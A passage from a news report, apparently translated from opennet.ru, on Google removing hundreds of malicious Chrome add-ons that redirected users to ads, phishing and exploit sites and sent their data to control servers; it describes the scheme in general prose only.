blocking a series of malicious add-ons to the Chrome browser, the victims of which were several million users. At the first stage, independent researcher Jamilya Kaya () and Duo Security identified 71 malicious add-ons in the Chrome Web Store. In total, these add-ons accounted for more than 1.7 million installations. After informing Google about the problem, more than 430 similar add-ons were found in the catalog, the number of installations of which was not reported.
Notably, despite the impressive number of installs, none of the problematic add-ons have user reviews, leading to questions about how the add-ons were installed and how malicious activity went unnoticed. Currently, all problematic add-ons have been removed from the Chrome Web Store.
According to researchers, malicious activity associated with blocked add-ons has been ongoing since January 2019, but individual domains used to perform malicious actions were registered as early as 2017.
For the most part, malicious add-ons were presented as tools for promoting products and participating in advertising services (the user views ads and receives royalties). The add-ons used the technique of redirecting to advertised sites when opening pages that were shown in a chain before displaying the requested site.
All add-ons used the same technique to hide malicious activity and bypass the Chrome Web Store's add-on verification mechanisms. The code of all add-ons was almost identical at the source level, with the exception of the function names, which were unique in each add-on. The transfer of malicious logic was carried out from centralized control servers. At first, the add-on was connected to a domain that had the same name as the add-on name (for example, Mapstrek.com), after which it was redirected to one of the control servers, which returned the script for further actions.
Among the actions carried out through add-ons are uploading user confidential data to an external server, forwarding to malicious sites and condoning the installation of malicious applications (for example, a message is displayed that the computer is infected and malware is offered under the guise of an antivirus or a browser update). Among the domains to which redirects were made are various phishing domains and sites for exploiting unupdated browsers containing unpatched vulnerabilities (for example, after exploitation, attempts were made to install malware that intercepts access keys and analyzes the transfer of confidential data through the clipboard).
Source: opennet.ru